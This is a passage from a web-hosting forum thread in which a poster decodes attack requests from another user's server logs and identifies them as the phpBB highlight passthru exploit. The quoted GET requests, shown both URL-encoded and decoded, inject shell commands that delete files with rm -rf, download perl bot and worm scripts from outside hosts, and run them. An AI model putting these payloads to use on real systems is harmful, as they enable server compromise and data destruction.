_END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
is
GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
is
GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
if run it does try to download a file into dirs and run it
in your case the try on "/usr/local/apache/proxy/" did work
so you got the files in there, unfortunatelly none of the URL's above works, so cant find out what the perl scripts do, guess download more files and do something else
someone might have used this script to exploit you
http://www.k-otik.com/exploits/20041...pbb2010.pl.php

your sure its vbb 3.0.5? looks like the phpbb highlight exploit code

Last edited by sehe; 01-12-2005 at 03:26 PM.
Reply With Quote
Reply

Related posts from TheWhir.com
Title Type Date Posted
Windows Azure Offers Active Directory in General Availability Web Hosting News 2013-04-09 14:09:20
Data Center Test – Phoenix NAP Shuts off the Power Web Hosting News 2012-12-13 15:10:26
Web Host Infinitely Virtual Eases Transition to Cloud Hosting with New Onboarding Service Web Hosting News 2012-09-10 14:36:48
Netcraft Continues to See a Drop in Responses for July 2012 Web Survey Web Hosting News 2012-07-03 14:35:26
Hosting Automation Software Provider 1H.com Adds Debian Support Web Hosting News 2011-11-15 21:53:57


« Previous Thread | Next Thread »
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Linear Mode Linear Mode
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:

cPanel Addresses User Concerns of Transfer and Backup Restore System Security

US Attorney says Government Should Have Warrants to Search Email

8kMiles Acquires Cloud Security Firm FuGen Solutions for $7.5 Million

Name.com Resets Customer Passwords After Security Breach

Outbound Spam Causing Sleepless Nights?

Malwarebytes Launches Data Scan-and-Backup Service

Commtouch Report: Spam, Malware Continues to Increase in Q1 2013

Researchers Urge System Admins to Check for New Apache Web Server Backdoor Malware

APWG Study Finds Phishers Increasingly Target Shared Virtual Servers

Man Arrested in Connection to Spamhaus DDoS Attacks



 

Learn more about advertising opportunities across the iNET Interactive Network.

LiquidWeb
X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?